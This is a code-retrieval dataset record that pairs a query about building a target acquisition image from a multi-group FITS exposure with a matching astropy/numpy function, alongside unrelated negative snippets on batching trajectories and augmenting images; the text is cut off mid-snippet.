)
batch = self.ctx.collate(torch_graphs)
batch.traj_lens = torch.tensor([len(i["traj"]) for i in trajs])
batch.num_backward = num_backward
batch.actions = torch.tensor(actions)
batch.rewards = rewards
batch.cond_info = cond_info
batch.is_valid = torch.tensor([i.get("is_valid", True) for i in trajs]).float()
return batch
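
The subtlest part is num_backward: every transition is weighted by the number of backward actions available from the next state, except the terminal step of each trajectory, which gets 1. A standalone sketch with toy trajectories and a hypothetical counting function (the real one is self.env.count_backward_transitions) shows how the flattened tensor lines up with traj_lens:

import torch

def count_backward_transitions(state):
    # hypothetical stand-in: pretend every non-terminal next state has 2 parents
    return 2

trajs = [{"traj": [("s0", "a0"), ("s1", "a1"), ("s2", "a2")]},
         {"traj": [("s0", "a0"), ("s1", "a1")]}]

num_backward = torch.tensor([
    count_backward_transitions(tj["traj"][i + 1][0]) if i + 1 < len(tj["traj"]) else 1
    for tj in trajs
    for i in range(len(tj["traj"]))
])
traj_lens = torch.tensor([len(tj["traj"]) for tj in trajs])
print(num_backward.tolist())  # [2, 2, 1, 2, 1] -- last step of each trajectory gets 1
print(traj_lens.tolist())     # [3, 2]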
|
[
"def split(self):\n trajectories = []\n start = 0\n for i, length in enumerate(self.lengths):\n stop = start + length\n traj = TrajectoryBatch(\n env_spec=self.env_spec,\n observations=self.observations[start:stop],\n last_observations=numpy.asarray([self.last_observations[i]]),\n actions=self.actions[start:stop],\n rewards=self.rewards[start:stop],\n terminals=self.terminals[start:stop],\n env_infos=tensor_utils.slice_nested_dict(self.env_infos, start, stop),\n agent_infos=tensor_utils.slice_nested_dict(\n self.agent_infos, start, stop\n ),\n lengths=numpy.asarray([length]),\n )\n trajectories.append(traj)\n start = stop\n return trajectories",
"def _batch_io(traj_io: Trajectories) -> Trajectory:\n\n assert traj_io # non-empty\n for sample_io in traj_io:\n for dp in sample_io:\n assert dp.data.shape[0] == 1 # batching axis\n\n batched_traj = traj_io[0] # construct batched trajectory in-place\n for cur_sample in traj_io[1:]:\n for i in range(len(batched_traj)):\n # Validate that each trajectory contains the same probes.\n assert batched_traj[i].name == cur_sample[i].name\n\n # Concatenate each probe along the trajectory/time axis.\n batched_traj[i] = probing.DataPoint(\n name=batched_traj[i].name,\n location=batched_traj[i].location,\n type_=batched_traj[i].type_,\n data=np.concatenate([batched_traj[i].data, cur_sample[i].data],\n axis=0))\n\n return batched_traj",
"def make_batch(l):\n if isinstance(l[0], int):\n return torch.LongTensor(l)\n if isinstance(l[0], float):\n return torch.FloatTensor(l)\n if isinstance(l[0], torch.Tensor):\n return torch.stack(l)\n raise ValueError(\"unknown batch type: {}\".format(type(l[0])))",
"def create_dataset(sublist):\n content = [dict_to_sparse_tensor(x) for x in sublist]\n dataset = tf.sparse_concat(axis=0, sp_inputs=content)\n dataset = tf.data.Dataset.from_tensor_slices((dataset))\n return dataset",
"def construct_batch(self, indices):\r\n # leave to exact case\r\n raise NotImplementedError",
"def concat_across_batch_dim(cls, trajs):\n if len(trajs) == 0:\n return None\n\n position_nk2 = np.concatenate([traj.position_nk2()\n for traj in trajs], axis=0)\n speed_nk1 = np.concatenate([traj.speed_nk1()\n for traj in trajs], axis=0)\n acceleration_nk1 = np.concatenate(\n [traj.acceleration_nk1() for traj in trajs], axis=0)\n heading_nk1 = np.concatenate(\n [traj.heading_nk1() for traj in trajs], axis=0)\n angular_speed_nk1 = np.concatenate(\n [traj.angular_speed_nk1() for traj in trajs], axis=0)\n angular_acceleration_nk1 = np.concatenate(\n [traj.angular_acceleration_nk1() for traj in trajs], axis=0)\n valid_horizons_n1 = np.concatenate(\n [traj.valid_horizons_n1 for traj in trajs], axis=0)\n\n dt = trajs[0].dt\n k = trajs[0].k\n n = position_nk2.shape[0]\n return cls(dt=dt, n=n, k=k, position_nk2=position_nk2,\n speed_nk1=speed_nk1, acceleration_nk1=acceleration_nk1,\n heading_nk1=heading_nk1, angular_speed_nk1=angular_speed_nk1,\n angular_acceleration_nk1=angular_acceleration_nk1,\n valid_horizons_n1=valid_horizons_n1)",
"def construct_batch(self, indices):\r\n # allocate batch memory\r\n input_birth_rate = []\r\n target_cnt_trans = []\r\n target_cnt_states = []\r\n target_P = []\r\n target_pi = []\r\n\r\n # traverse all indices\r\n for idx in indices:\r\n birth_rate, cnt_trans, cnt_states, P, pi = self.samples[idx]\r\n input_birth_rate.append(birth_rate)\r\n target_cnt_trans.append(cnt_trans)\r\n target_cnt_states.append(cnt_states)\r\n target_P.append(P)\r\n target_pi.append(pi)\r\n\r\n # transform data into valid tensors\r\n input_birth_rate = torch.LongTensor(input_birth_rate).type(self.tensor).to(self.device)\r\n target_cnt_trans = torch.stack(target_cnt_trans).type(self.tensor).to(self.device)\r\n target_cnt_states = torch.stack(target_cnt_states).type(self.tensor).to(self.device)\r\n target_P = torch.stack(target_P).type(self.tensor).to(self.device)\r\n target_pi = torch.stack(target_pi).type(self.tensor).to(self.device)\r\n return input_birth_rate, ((target_cnt_trans, target_cnt_states), (target_P, target_pi))",
"def _create_mini_batch(self, subsongs):\n # Get matrix with shape [num_instances, time_steps, num_features]\n input_matrix = np.asarray([input_tensor for input_tensor, target_tensor in subsongs])\n target_matrix = np.asarray([target_tensor for input_tensor, target_tensor in subsongs])\n \n # Divide them into list of MiniBatch \n num_mini_batch = int(math.ceil(len(input_matrix) / self.args.train_mini_batch_size))\n mini_batches = []\n for batch_i in range(num_mini_batch):\n mini_batch = DatasetPreparor.MiniBatch()\n start_i = batch_i * self.args.train_mini_batch_size\n end_i = (batch_i + 1) * self.args.train_mini_batch_size\n if end_i > len(input_matrix):\n end_i = len(input_matrix)\n mini_batch.inputs = input_matrix[start_i:end_i]\n mini_batch.targets = target_matrix[start_i:end_i]\n mini_batches.append(mini_batch)\n return mini_batches",
"def create_batch(cls, size, **kwargs):\n return [cls.create(**kwargs) for _ in range(size)]",
"def gather_across_batch_dim_and_create(cls, traj, idxs):\n dt = traj.dt\n n = idxs.size\n k = traj.k\n\n def gather(arr, idxs): # used for when arr is multidim and dont want slicing\n return arr[idxs]\n\n position_nk2 = gather(traj.position_nk2(), idxs)\n speed_nk1 = gather(traj.speed_nk1(), idxs)\n acceleration_nk1 = np.zeros_like(traj.acceleration_nk1()) if traj.acceleration_nk1().size == 0 else gather(\n traj.acceleration_nk1(), idxs)\n heading_nk1 = gather(traj.heading_nk1(), idxs)\n angular_speed_nk1 = gather(traj.angular_speed_nk1(), idxs)\n angular_acceleration_nk1 = np.zeros_like(traj.angular_acceleration_nk1()) if traj.angular_acceleration_nk1(\n ).size == 0 else gather(traj.angular_acceleration_nk1(), idxs)\n valid_horizons_n1 = gather(traj.valid_horizons_n1, idxs)\n return cls(dt=dt, n=n, k=k, position_nk2=position_nk2,\n speed_nk1=speed_nk1, acceleration_nk1=acceleration_nk1,\n heading_nk1=heading_nk1, angular_speed_nk1=angular_speed_nk1,\n angular_acceleration_nk1=angular_acceleration_nk1,\n valid_horizons_n1=valid_horizons_n1)",
"def batch_trajectory_to_single_trajectory(trajectory):\n batch_shape = trajectory[0].state.shape[:-1]\n out = []\n for batch_obs in trajectory:\n expanded_obs = Observation(\n *[k.repeat(batch_shape) if k.dim() < 1 else k for k in batch_obs]\n )\n squeezed_obs = Observation(\n *[k.reshape(-1, *k.shape[len(batch_shape) :]) for k in expanded_obs]\n )\n out += [Observation(*k) for k in zip(*squeezed_obs)]\n\n return out",
"def batch(list_to_batch, batch_size=BATCH_SIZE):\n for i in range(0, len(list_to_batch), batch_size):\n yield tuple(list_to_batch[i:i + batch_size])",
"def sample_trajectories_batch(model, context, device, cfg):\n n_samples = cfg['extractor_cfg']['n_samples']\n n_time_steps = cfg['model_params']['future_num_frames']\n bs = context.shape[0]\n samples = torch.zeros((bs, 1, n_samples, 2 * n_time_steps))\n for i in range(n_samples):\n z = torch.randn(bs, cfg['cvae_cfg']['latent_dim']).to(device)\n with torch.no_grad():\n trajectories = model.inference(z, context)\n samples[:, 0, i, :] = trajectories\n return samples",
"def batchify(batch):\n\n \"\"\"Gather a batch of individual examples into one batch.\"\"\"\n NUM_INPUTS = 3\n NUM_TARGETS = 2\n NUM_EXTRA = 1\n\n ids = [ex[-1] for ex in batch]\n docs = [ex[0] for ex in batch]\n features = [ex[1] for ex in batch]\n questions = [ex[2] for ex in batch]\n\n # Batch documents and features\n max_length = max([d.size(0) for d in docs])\n docs_indices = torch.LongTensor(len(docs), max_length).zero_()\n docs_mask = torch.ByteTensor(len(docs), max_length).fill_(1)\n if features[0] is None:\n docs_feature = None\n else:\n docs_feature = torch.zeros(len(docs), max_length, features[0].size(1))\n for i, d in enumerate(docs):\n docs_indices[i, :d.size(0)].copy_(d)\n docs_mask[i, :d.size(0)].fill_(0)\n if docs_feature is not None:\n docs_feature[i, :d.size(0)].copy_(features[i])\n\n # Batch questions\n max_length = max([q.size(0) for q in questions])\n questions_indices = torch.LongTensor(len(questions), max_length).zero_()\n questions_mask = torch.ByteTensor(len(questions), max_length).fill_(1)\n for i, q in enumerate(questions):\n questions_indices[i, :q.size(0)].copy_(q)\n questions_mask[i, :q.size(0)].fill_(0)\n\n # Maybe return without targets\n if len(batch[0]) == NUM_INPUTS + NUM_EXTRA:\n return docs_indices, docs_feature, docs_mask, questions_indices, questions_mask, ids\n\n elif len(batch[0]) == NUM_INPUTS + NUM_EXTRA + NUM_TARGETS:\n # ...Otherwise add targets\n if torch.is_tensor(batch[0][3]):\n start = torch.cat([ex[3] for ex in batch])\n end = torch.cat([ex[4] for ex in batch])\n else:\n start = [ex[3] for ex in batch]\n end = [ex[4] for ex in batch]\n else:\n raise RuntimeError('Incorrect number of inputs per example.')\n\n return docs_indices, docs_feature, docs_mask, questions_indices, questions_mask, start, end, ids",
"def test_source_dataset_factory_build_batch(self):\n source_datasets = factories.SourceDatasetFactory.build_batch(10)\n for one in source_datasets:\n self.assertIsInstance(one, models.SourceDataset)",
"def generate_batch_song(list_all_midi, batch_music=16, start_index=0, fs=30, seq_len=50, use_tqdm=False):\n\n assert len(list_all_midi) >= batch_music\n dict_time_notes = generate_dict_time_notes(list_all_midi, batch_music, start_index, fs, use_tqdm=use_tqdm)\n\n list_musics = process_notes_in_song(dict_time_notes, seq_len)\n collected_list_input, collected_list_target = [], []\n\n for music in list_musics:\n list_training, list_target = generate_input_and_target(music, seq_len)\n collected_list_input += list_training\n collected_list_target += list_target\n return collected_list_input, collected_list_target",
"def _createBatch(self, samples):\n\n batch = Batch()\n batchSize = len(samples)\n\n sentence_num_max = 0\n # Create the batch tensor\n for i in range(batchSize):\n # Unpack the sample\n context_tokens, q_tokens, option, word_start, word_end, option_raw, sentence_info, all_answer_text = samples[i]\n\n if len(context_tokens) > args['maxLengthEnco']:\n context_tokens = context_tokens[:args['maxLengthEnco']]\n\n batch.contextSeqs.append(context_tokens)\n batch.context_lens.append(len(batch.contextSeqs[i]))\n batch.questionSeqs.append(q_tokens)\n batch.question_lens.append(len(batch.questionSeqs[i]))\n batch.answerSeqs.append(option)\n batch.ans_lens.append(len(option))\n batch.raw_ans.append(option_raw)\n sentence_num_max = max(sentence_num_max, len(sentence_info))\n batch.starts.append(word_start)\n batch.ends.append(word_end)\n batch.all_answers.append(all_answer_text)\n # batch.core_sen_ids.append(core_sen_id)\n\n maxlen_con = max(batch.context_lens)\n maxlen_q = max(batch.question_lens)\n maxlen_opt = max(batch.ans_lens)\n # args['chargenum'] + 1 padding\n\n for i in range(batchSize):\n sentence_info = samples[i][6]\n batch.contextSeqs[i] = batch.contextSeqs[i] + [self.word2index['PAD']] * (\n maxlen_con - len(batch.contextSeqs[i]))\n batch.questionSeqs[i] = batch.questionSeqs[i] + [self.word2index['PAD']] * (\n maxlen_q - len(batch.questionSeqs[i]))\n\n batch.decoderSeqs.append([self.word2index['START_TOKEN']] + batch.answerSeqs[i] + [self.word2index['PAD']] * (\n maxlen_opt - len(batch.answerSeqs[i])))\n batch.targetSeqs.append(batch.answerSeqs[i] + [self.word2index['END_TOKEN']] + [self.word2index['PAD']] * (\n maxlen_opt - len(batch.answerSeqs[i])))\n batch.answerSeqs[i] = batch.answerSeqs[i] + [self.word2index['PAD']] * (\n maxlen_opt - len(batch.answerSeqs[i]))\n batch.sentence_mask.append(np.zeros([sentence_num_max, maxlen_con]))\n start = 0\n end = 0\n for ind, sen_l in enumerate(sentence_info):\n end += sen_l\n batch.sentence_mask[i][ind, start:end] = 1\n start = end\n batch.context_mask[i, :sen_l] = 1\n\n return batch",
"def tlist_to_flat(trajs):\n # Check all trajectories are same order tensors.\n traj_orders = np.array([len(np.shape(ti)) for ti in trajs])\n if np.any(traj_orders != traj_orders[0]):\n raise ValueError(\"Input Trajectories have varying dimension\")\n if traj_orders[0] == 1:\n trajs = [t_i.reshape(-1, 1) for t_i in trajs]\n # Get dimensions of traj object.\n d = len(trajs[0][0])\n # Populate the large trajectory.\n traj_2d = []\n traj_edges = [0]\n len_traj_2d = 0\n for i, traj in enumerate(trajs):\n # Check that trajectory is of right format.\n if len(np.shape(traj)) != 2:\n raise ValueError('Trajectory %d is not two dimensional!' % i)\n d2 = np.shape(traj)[1]\n if d2 != d:\n raise ValueError('Trajectories are of incompatible dimension. The first trajectory has dimension %d and trajectory %d has dimension %d' % (d, i, d2))\n traj_2d += list(traj)\n len_traj_2d += len(traj)\n traj_edges.append(len_traj_2d)\n return np.array(traj_2d), np.array(traj_edges)",
"def make_trajectory_dataset(data_files, state_dim, action_dim):\n data = (tf.data.Dataset.list_files(data_files)\n .interleave(tf.data.TFRecordDataset, 1)\n .map(TrajectoryDecoder(state_dim, action_dim)))\n\n return data"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Create the image on which to perform the centroiding given a fits file containing an exposure with multiple groups. In the case of multiple integrations in the exposure, use only the first, and produce a single TA image.
|
import os

import numpy as np
from astropy.io import fits


def make_ta_image(infile, ext=0, useframes=3, save=False, silent=False):
# Read in data. Convert to floats
with fits.open(infile) as h:
data = h[ext].data
head = h[ext].header
data = data * 1.
shape = data.shape
if len(shape) <= 2:
raise RuntimeError(("Warning: Input target acq exposure must "
"have multiple groups!"))
elif len(shape) == 3:
# If there are only 3 dimensions, check the header keywords to identify ngroups, nints against the shape of the cube
# If there are multiple integrations, use only the first
if shape[0] == head['NGROUPS'] * head['NINT']:
data = data[:head['NGROUPS'], :, :]
shape = data.shape
else:
raise RuntimeError("Number of groups and integrations in header does not match data format")
elif len(shape) == 4:
# If there are multiple integrations, use only the first
data = data[0, :, :, :]
ngroups = shape[-3]
# don't report an error if data has an even number of groups, but do print a warning.
if ngroups % 2 == 0:
#raise RuntimeError(("Warning: Input target acq exposure "
# "must have an odd number of groups!"))
if not silent:
print('Warning: Input data has an even number of groups')
    # First check whether an integer or a list was provided
# Group numbers to use. Adjust the values to account for
# python being 0-indexed
if type(useframes) is int:
if useframes == 3:
            frames = [0, (ngroups - 1) // 2, ngroups - 1]
if not silent:
print('Data has {0} groups'.format(ngroups))
print('Using {0} for differencing'.format([frame+1 for frame in frames]))
scale = (frames[1] - frames[0]) / (frames[2] - frames[1])
#print('Scale = {0}'.format(scale))
diff21 = data[frames[1], :, :] - data[frames[0], :, :]
diff32 = scale * (data[frames[2], :, :] - data[frames[1], :, :])
ta_img = np.minimum(diff21, diff32)
else: #can now be arbitrary
            #automatically determines which frames to use for an arbitrary useframes value
frames = np.round(np.linspace(0, ngroups-1, useframes)).astype(int)
if not silent:
print('Data has {0} groups'.format(ngroups))
print('Using {0} for differencing'.format([frame+1 for frame in frames]))
#need a scale for each additional difference image
scales = [(frames[1]-frames[0]) / (frames[s+2] - frames[s+1]) for s in range(useframes-2)]
scales.insert(0,1.0)
#create diff images
diffs = [scales[i] * (data[frames[i+1], :, :] - data[frames[i], :, :]) for i in range(len(scales))]
#create TA image from element-wise minimum of all diff images
ta_img = np.minimum.reduce(diffs)
elif type(useframes) is list:
assert all(type(n) is int for n in useframes), "When passing a list to useframes, all entries must be integers."
assert len(useframes) in [3, 5], "A useframes list can currently only contain 3 or 5 values."
# once asserted we have a list of 3 or 5 integers, sort and check that the numbers make sense.
useframes.sort()
assert useframes[-1] <= ngroups, "Highest group number exceeds the number of groups in the integration."
# adjust the values to account for python being 0-indexed
frames = [n-1 for n in useframes]
if not silent:
print('Data has {0} groups'.format(ngroups))
print('Using {0} for differencing'.format([frame+1 for frame in frames]))
scale = (frames[1] - frames[0]) / (frames[2] - frames[1])
print('Scale = {0}'.format(scale))
diff21 = data[frames[1], :, :] - data[frames[0], :, :]
diff32 = scale * (data[frames[2], :, :] - data[frames[1], :, :])
ta_img = np.minimum(diff21, diff32)
    if save:
h0 = fits.PrimaryHDU(ta_img)
hl = fits.HDUList([h0])
indir, inf = os.path.split(infile)
# if we've provided a custom list then add the group numbers to the output filename
if type(useframes) is list:
str_frames = [str(u) for u in useframes]
grps = ''.join(str_frames)
tafile = os.path.join(indir, 'TA_img_grp'+grps+'_for_'+inf)
else:
tafile = os.path.join(indir, 'TA_img_for_'+inf)
hl.writeto(tafile, overwrite=True)
return ta_img
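
Hypothetical usage; 'ta_exposure.fits' is a placeholder for a real multi-group target acquisition exposure, and the calls assume the imports added above the function:

ta = make_ta_image('ta_exposure.fits', ext=0, useframes=3, save=False)
print(ta.shape)   # 2-D TA image with the spatial shape of a single group

# Explicit (1-indexed) groups; with save=True the result is written next to the
# input as TA_img_grp135_for_ta_exposure.fits
ta = make_ta_image('ta_exposure.fits', useframes=[1, 3, 5], save=True)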
|
[
"def create_ana_images(self):\n log.debug(\"start\")\n os.chdir(self._p_analysis_tmp)\n exif_attributes=self._exif_attributes\n exif_attributes=\" \".join([\"-\"+a for a in exif_attributes])\n\n # quiet option suppreses regular output\n cmd_exif=ImageAnalyzer.CMD_EXIFTOOL_JSON.replace(\"_EXIF_\",self._exiftool)\n cmd_exif=cmd_exif.replace(\"ATT\",exif_attributes)\n\n cmd_out = None\n runner = Runner()\n ret_code=runner.run_cmd(cmd_exif)\n if ret_code == 0:\n cmd_out=runner.get_output()\n files_metadata={}\n\n try:\n files_metadata=json.loads(cmd_out)\n except JSONDecodeError as e:\n err_details={\"msg\":e.msg,\"col\":str(e.colno),\"line\":str(e.lineno)}\n log.error(\"JSON Decode Error: %(msg)s error occured in output at column %(col)s, line %(line)s\",err_details)\n\n for file_metadata in files_metadata:\n\n filename=Path(file_metadata[\"SourceFile\"])\n filename=filename.stem+\"_ana\"+filename.suffix\n file_metadata[\"TargetFile\"]=os.path.join(self._p_analysis,filename)\n file_metadata[\"FocusBox\"]=ImageAnalyzer.get_focus_box(file_metadata)\n file_metadata[\"Description\"]=ImageAnalyzer.create_analysis_text(file_metadata)\n # convert to a os magick command\n draw_config=self._magick_box_config.copy()\n try:\n draw_config[\"_FILE_IN_\"]=file_metadata[\"SourceFile\"]\n draw_config[\"_FILE_OUT_\"]=file_metadata[\"TargetFile\"]\n draw_config[\"_TEXT_\"]=file_metadata[\"Description\"]\n draw_config[\"_X0_\"]=str(file_metadata[\"FocusBox\"][0][0])\n draw_config[\"_Y0_\"]=str(file_metadata[\"FocusBox\"][0][1])\n draw_config[\"_X1_\"]=str(file_metadata[\"FocusBox\"][2][0])\n draw_config[\"_Y1_\"]=str(file_metadata[\"FocusBox\"][2][1])\n except TypeError as e:\n log.error(\"not all metadata found to create focus box (%s)\",e)\n continue\n # replace template\n cmd_magick=ImageAnalyzer.CMD_MAGICK_DRAW_FOCUS_BOX\n for k,v in draw_config.items():\n cmd_magick=cmd_magick.replace(k,v)\n file_metadata[\"CmdMagick\"]=cmd_magick\n\n # writing files with focus box and meta data\n runner = Runner()\n for file_metadata in files_metadata:\n cmd=file_metadata.get(\"CmdMagick\")\n\n if not cmd:\n continue\n ret_code=runner.run_cmd(cmd)\n if ret_code == 0:\n log.info(\"Writing file %s\",file_metadata['TargetFile'])\n cmd_out=runner.get_output()\n else:\n log.error(\"Error writing file %s\",file_metadata['TargetFile'])\n\n return files_metadata",
"def augmentator(images, masks):\n spatial_aug = iaa.Sequential([\n iaa.Fliplr(0.5), # horizontal flips\n iaa.Flipud(0.5), # vertical flips\n iaa.Crop(percent=(0, 0.1)), # random crops\n # Apply affine transformations to each image.\n # Scale/zoom them, translate/move them, rotate them and shear them.\n iaa.Affine(\n scale=(0.8, 1.2),\n translate_percent={\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)},\n rotate=(-20, 20),\n # shear=(-20, 20),\n order=[1], # use nearest neighbour or bilinear interpolation (fast)\n cval=125, # if mode is constant, use a cval between 0 and 255\n mode=\"reflect\",\n name=\"Affine\")\n ], random_order=True)\n\n blur_aug = iaa.Sequential([\n # Blur about 50% of all images.\n iaa.Sometimes(0.5,\n iaa.OneOf([\n iaa.GaussianBlur(sigma=(0, 0.5)),\n iaa.AverageBlur(k=(3, 7)),\n iaa.MedianBlur(k=(3, 7)),\n ])\n )\n\n ], random_order=True)\n\n elastic_aug = iaa.Sometimes(0.5, [iaa.ElasticTransformation(alpha=(30, 60), sigma=10)])\n\n other_aug = iaa.Sequential([\n iaa.Sometimes(0.5, [\n iaa.OneOf([\n iaa.contrast.CLAHE(clip_limit=2),\n iaa.contrast.GammaContrast(gamma=(0.5, 2.0))\n ]),\n # change brightness of images\n iaa.Add((-40, 40))\n ])\n ], random_order=True)\n\n # Freeze randomization to apply same to labels\n spatial_det = spatial_aug.to_deterministic()\n elastic_det = elastic_aug.to_deterministic()\n\n # when input mask is float32, the no channels must be 3 as it would be 3 classes.\n # TODO: remove nb_classes parameter, it's deprecated\n segmaps = [SegmentationMapOnImage(m, nb_classes=3, shape=images[i].shape) for i, m in enumerate(masks)]\n\n aug_images, aug_masks = spatial_det.augment_images(images), spatial_det.augment_segmentation_maps(segmaps=segmaps)\n aug_images, aug_masks = elastic_det.augment_images(aug_images), elastic_det.augment_segmentation_maps(segmaps=aug_masks)\n aug_images = blur_aug.augment_images(aug_images)\n aug_images = other_aug.augment_images(aug_images)\n\n # convert seg_maps into numpy arrays with shape (H,W,1)\n # TODO: use get_arr() function for converting to a numpy array the SegmentationMapOnImage instances\n aug_masks = [np.expand_dims(m.arr[:, :, 0], axis=2) for m in aug_masks]\n\n return aug_images, aug_masks",
"def getCentroids(self, srcfile, outfile):\n\n self.srcfile = srcfile\n self.outfile = outfile\n\n with fiona.drivers():\n\n logging.info(\"Reading file: \" + self.srcfile)\n\n with fiona.open(self.srcfile) as src:\n self.meta = src.meta\n self.meta['schema']['geometry'] = 'Point'\n\n logging.info(\"Creating output file: \" + self.outfile)\n\n with fiona.open(self.outfile, 'w', **self.meta) as dst:\n\n for f in src:\n centroid = shape(f['geometry']).centroid\n f['geometry'] = mapping(centroid)\n dst.write(f)\n\n logging.info(\"Done creating centroids for all features. Writing to the specified output file.\")",
"def get_center_estimates( self, oid, frames=None, set_as_new=False ):\n assert oid>=0\n assert oid<len(self.object_names)\n \n if frames is None:\n frames = range(len(self.images)) \n\n better_centers = self.object_seedpoints[oid]\n for f in frames:\n if not self.object_seedpoints[oid][f] is None:\n assert not self.netsurfs[oid][f] is None # segmentation must have been performed\n netsurf = self.netsurfs[oid][f]\n better_centers[f] = np.array(netsurf.get_surface_point(0))\n for i in range(1,netsurf.num_columns):\n better_centers[f] += netsurf.get_surface_point(i)\n better_centers[f] /= netsurf.num_columns\n if not self.silent:\n print(' Updated center to',better_centers[f])\n # update seedpoints if that was desired\n if set_as_new: self.object_seedpoints[oid] = better_centers\n return better_centers",
"def image_center(image, bbox, center_size):\n center = np.array([int(bbox.center_x), int(bbox.center_y)])\n center_init_coords = center - center_size//2\n center_rect = [center_init_coords[0], \n center_init_coords[1], \n center_init_coords[0] + center_size, \n center_init_coords[1] + center_size] #x1, y1, x2, y2\n center_image = image[center_rect[1]: center_rect[3], center_rect[0]: center_rect[2], :] \n center_mn = np.mean(center_image)\n return center_image, center_mn, center_rect",
"def fit_imagecenter(self, center, centroids, angles, popt):\n\n # Radial coordinates\n xmean, ymean = center[0], center[1]\n dx, dy = centroids[\"x\"] - xmean, centroids[\"y\"] - ymean\n radial = np.sqrt(dx**2 + dy**2)\n\n # Fitted angles\n fit_angles = self.polynomial_fit(radial, *popt)\n\n # Normaly a1 and a2 should have the same size\n a1 = abs(angles.reshape(-1))\n a2 = abs(fit_angles.reshape(-1))\n\n linfit = stats.linregress(a1[np.isfinite(a1)], a2[np.isfinite(a2)])\n residuals = abs(a2 - (a1 * linfit[0] + linfit[1]))\n\n return np.nanmean(residuals)",
"def __call__(self,\n image: sitk.Image,\n mask: sitk.Image) -> Tuple[sitk.Image, sitk.Image, sitk.Image]:\n hires_ref = sitk.Image(*self.hires_size, sitk.sitkFloat32)\n lores_ref = sitk.Image(*self.lores_size, sitk.sitkFloat32)\n hires_ref.SetSpacing(self.hires_spacing)\n lores_ref.SetSpacing(self.lores_spacing)\n\n image_centre = find_centre(image)\n hires_centre = find_centre(hires_ref)\n lores_centre = find_centre(lores_ref)\n\n hires_ref.SetOrigin(image_centre - hires_centre)\n lores_ref.SetOrigin(image_centre - lores_centre)\n\n transform = sitk.Transform(3, sitk.sitkComposite)\n mask_centroid = find_centroid(mask)\n centering = sitk.TranslationTransform(3, (mask_centroid - image_centre).tolist())\n transform.AddTransform(centering)\n if self.augment:\n rotation = np.random.uniform(*self.rotation_range) if self.rotation_range is not None else None\n flip = np.random.binomial(1, .5) if self.flip else None\n shear = np.random.uniform(*self.shear_range) if self.shear_range is not None else None\n scaling = np.random.uniform(*self.scaling_range) if self.scaling_range is not None else None\n translation = [\n np.random.uniform(*self.translation_range),\n np.random.uniform(*self.translation_range),\n 0.\n ] if self.translation_range is not None else None\n transform.AddTransform(make_affine_transform(image_centre, rotation, flip, shear, scaling, translation))\n if self.elastic_alpha is not None and self.elastic_grid_size is not None:\n transform.AddTransform(make_elastic_transform(hires_ref, self.elastic_grid_size, self.elastic_alpha))\n\n fill_val = float(sitk.GetArrayViewFromImage(image).min())\n\n hires_image = sitk.Resample(image, hires_ref, transform, sitk.sitkLinear, fill_val)\n lores_image = sitk.Resample(image, lores_ref, transform, sitk.sitkLinear, fill_val)\n hires_mask = sitk.Resample(mask, hires_ref, transform, sitk.sitkNearestNeighbor, 0)\n\n return hires_image, lores_image, hires_mask",
"def offset_mosaic(input_prefix,\n output_prefix,\n filter_list=['w2','m2','w1','uu','bb','vv'],\n min_exp_w2=170, min_exp_m2=230, min_exp_w1=200,\n min_exp_uu=0, min_exp_bb=0, min_exp_vv=0,\n restack_id=False, mask_file=None, use_scattered_light=False):\n\n # make dictionary with the minimum exposure times\n min_exp = {'w2':min_exp_w2, 'm2':min_exp_m2, 'w1':min_exp_w1,\n 'uu':min_exp_uu, 'bb':min_exp_bb, 'vv':min_exp_vv}\n\n # set a file tag for using images corrected for scattered light\n sl_tag = ''\n if use_scattered_light:\n sl_tag = '_sl'\n \n\n # go through each filter to build images\n\n for filt in filter_list:\n\n # ------------------------\n # find unique target IDs, and stack those first\n # ------------------------\n\n # open the images\n with fits.open(input_prefix + filt + '_sk_all'+sl_tag+'.fits') as hdu_sk, fits.open(input_prefix + filt + '_ex_all.fits') as hdu_ex:\n\n # delete the 0th extensions (no images there, and they break later steps)\n del hdu_sk[0]\n del hdu_ex[0]\n \n # remove extensions with exposures shorter than minimum\n exp_time = np.array( [hdu_sk[i].header['EXPOSURE'] for i in range(len(hdu_sk))] )\n remove_ind = np.where(exp_time < min_exp[filt])[0]\n for ind in sorted(remove_ind, reverse=True):\n del hdu_sk[ind]\n del hdu_ex[ind]\n\n\n\n # all of the target IDs\n target_ids = np.array( [hdu_sk[i].header['TARG_ID'] for i in range(len(hdu_sk))] )\n # chop it down to just the unique ones\n target_ids = np.unique(target_ids)\n\n \n for targ in target_ids:\n\n print('')\n print('##### stacking target ID ' + str(targ) + ', filter ' + filt + ' #####')\n print('')\n\n # prefix for saving the files for this target ID\n file_prefix = output_prefix + str(targ) + '_' + filt\n\n # check if this one is done already (by looking for a count rate image)\n if os.path.isfile(file_prefix + '_cr'+sl_tag+'.fits') and (restack_id == False):\n print(str(targ)+' is already done')\n print('')\n continue\n \n \n # temp file to hold snapshots with current target ID\n temp_hdu_sk = fits.HDUList()\n temp_hdu_ex = fits.HDUList()\n\n # append matching snapshots\n [temp_hdu_sk.append(fits.ImageHDU(data=hdu_sk[i].data, header=hdu_sk[i].header)) for i in range(len(hdu_sk)) if hdu_sk[i].header['TARG_ID'] == targ]\n [temp_hdu_ex.append(fits.ImageHDU(data=hdu_ex[i].data, header=hdu_ex[i].header)) for i in range(len(hdu_sk)) if hdu_sk[i].header['TARG_ID'] == targ]\n\n # turn exposure maps into 0s and 1s\n temp_hdu_ex_adj = copy.deepcopy(temp_hdu_ex)\n temp_hdu_ex_adj = exp_to_ones(temp_hdu_ex_adj)\n\n # mask areas with foreground stars, etc.\n if mask_file is not None:\n temp_hdu_ex_adj = mask_image(temp_hdu_ex_adj, mask_file)\n\n # write out to files\n temp_hdu_sk.writeto('targ_temp_sk.fits', overwrite=True)\n temp_hdu_ex_adj.writeto('targ_temp_ex.fits', overwrite=True)\n \n # find the coordinates of the overlapping area\n overlap_x, overlap_y = find_overlap('targ_temp_ex.fits')\n\n # find the biweight of the overlapping areas\n biweight_cps = calc_overlap_val(temp_hdu_sk, temp_hdu_ex, overlap_x, overlap_y)\n\n # apply to the counts images\n hdu_sk_corr, _, hdu_delta_counts = correct_sk(temp_hdu_sk, temp_hdu_ex, biweight_cps)\n \n # write out to files\n hdu_sk_corr.writeto(file_prefix + '_sk_all'+sl_tag+'.fits', overwrite=True)\n hdu_delta_counts.writeto(file_prefix + '_sk_off_all'+sl_tag+'.fits', overwrite=True)\n temp_hdu_ex.writeto(file_prefix + '_ex_all'+sl_tag+'.fits', overwrite=True)\n \n # 